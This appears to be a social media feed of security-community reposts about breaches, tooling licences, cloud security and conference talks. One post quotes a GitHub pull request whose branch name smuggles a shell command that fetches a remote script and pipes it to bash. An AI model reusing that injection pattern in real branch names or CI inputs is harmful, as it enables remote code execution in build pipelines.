Advertisement · 728 × 90

Posts by emil

awesome HTML slides with live interaction!

10 months ago 2 0 0 0

Sweet!

1 year ago 1 0 0 0

All military aid from the U.S. to Ukraine from 2014-2024 has cost the U.S. tax payer $19.94 per person per year.

In return they got to destroy Russia’s entire Soviet equipment inheritance and still complain it is a bad deal

1 year ago 1653 460 29 33
Preview
Safe.eth on X: "Investigation Updates and Community Call to Action" / X Investigation Updates and Community Call to Action

New details on the ByBit/Safe{Wallet} breach, and uhhh wow, some really silly blunders on the DPRK side. They still succeeded which is the most upsetting part of all of this. Let's bully some threat actor tradecraft! A🧵
x.com/safe/status/...

1 year ago 23 12 1 2

quick maths 60/4=15 hours per day, easy 🥵

1 year ago 0 0 0 0

Very interesting work!

1 year ago 1 0 0 0

Reminder that the Call for Presentations for Sikkerhetsfestivalen (The Security Festival) is open. OWASP Oslo is hosting an AppSec track. Scroll down the page for English version:

sikkerhetsfestivalen.no/alle-nyheter...

1 year ago 1 2 0 0
Advertisement

Seems like there's a bit of confusion around the recent @Semgrep licence change and the @opengrep fork and I think there are two key points to highlight.

1/10

1 year ago 6 3 1 0

yes, that one almost reads as it is a AI generated point. lol

1 year ago 1 0 1 0
Post image

I've spent dozens of hours reading State of Cloud Security reports

You know, the ones that use data from their CSPM product

And I've realized the findings substantially reflect how well that tool helps customers secure their clouds

I wrote up some examples, both good and bad (🔗 in 🧵)

1 year ago 8 4 1 0

Slides for the @bsideslondon.bsky.social container security workshop presented with @smarticu5.bsky.social and @marionmccune.bsky.social are here blog.iainsmart.co.uk/talks/BSides...

1 year ago 22 8 1 0
Picture of a Github PR with text reading

openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Picture of a Github PR with text reading openimbot wants to merge 0 commits into ultralytics:main from openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

absolutely incredible attack vector

1 year ago 948 258 17 53

any idea why CSRF is +5 since last year? I rarely see CSRF reports these days.

1 year ago 0 0 0 0
Modern solutions against cross-site attacks Modern solutions against cross-site attacks

Modern solutions against cross-site attacks (frederikbraun.de/modern-solut...): An article about cross-site leak attacks and browser-based defenses. You will also learn why web security best practices is always opt-in and finally how YOU can get increased security controls.

1 year ago 34 19 0 1
Advertisement

This is a fascinating case study of real operational use of cryptography by non-technical people, of OPSEC, of anonymity tech, and of web security.

cw: drugs

1 year ago 67 16 0 0
Preview
How Tailscale's infrastructure team stays small Tailscale’s secure, simplified networking solution helps DevOps teams eliminate infrastructure headaches. Learn how our infra team of just three engineers uses Tailscale to handle networking, secrets,...

tailscale.com/blog/infra-t...

Awesome article by @tailscale.com team. It shows the good stuff that can happen if you take product design security and scalability from the get go. Kudos to the team, and I think at this point I should call myself a fanboy xD

I didn't know about setec. That's awesome

1 year ago 5 3 0 0
Preview
Awseye - See Inside AWS Accounts Awseye tracks publicly accessible AWS data to help identify and secure known and exposed AWS resources. Empowering defenders with open-source intelligence.

The self described “Shodan of AWS” is now live! This is an amazing project from Daniel Grzelak that helps democratize cloud resource enumeration for the masses. Very excited about this!
awseye.com

1 year ago 71 34 2 3
Posts by Category This site hosts a list of talks from various conferences on the topic of Cloud Native security.

If you're looking for the security talks from Kubecon NA 2024, I've added the abstracts and Youtube embeds to talks.container-security.site/categories/#... .

There's also talks going back to 2016 in case you really want to watch a lot of container security videos!

1 year ago 35 10 1 0